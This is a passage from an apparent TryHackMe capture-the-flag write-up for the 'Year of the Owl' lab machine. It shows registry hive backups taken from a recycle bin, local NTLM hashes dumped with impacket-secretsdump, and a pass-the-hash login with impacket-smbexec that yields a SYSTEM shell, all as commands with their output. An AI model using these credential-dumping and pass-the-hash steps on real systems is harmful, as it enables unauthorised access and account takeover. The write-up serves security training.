Registry Hive
Backup copies of registry hive files have been located in the recycle bin of the Jareth user. They were transferred to Kali
Hashdump
┌──(kali㉿kali)-[~/archive/thm/yearoftheowl]
└─$ impacket-secretsdump local -sam ./sam.bak -system system.bak
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Target system bootKey: 0xd676472afd9cc13ac271e26890b87a8c
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:6bc99ede9edcfecf9662fb0c0ddcfa7a:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:39a21b273f0cfd3d1541695564b4511b:::
Jareth:1001:aad3b435b51404eeaad3b435b51404ee:5a6103a83d2a94be8fd17161dfd4555a:::
[*] Cleaning up... dumping system hashes
Shelldrop
┌──(kali㉿kali)-[~/archive/thm/yearoftheowl]
└─$ impacket-smbexec administrator@$IP -target-ip $IP -hashes aad3b435b51404eeaad3b435b51404ee:6bc99ede9edcfecf9662fb0c0ddcfa7a
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32> hostname
year-of-the-owl
C:\Windows\system32> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet:
Connection-specific DNS Suffix . : eu-west-1.compute.internal
Link-local IPv6 Address . . . . . : fe80::5870:aed1:8570:73ba%7
IPv4 Address. . . . . . . . . . . : 10.10.163.21
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : 10.10.0.1System Level Compromise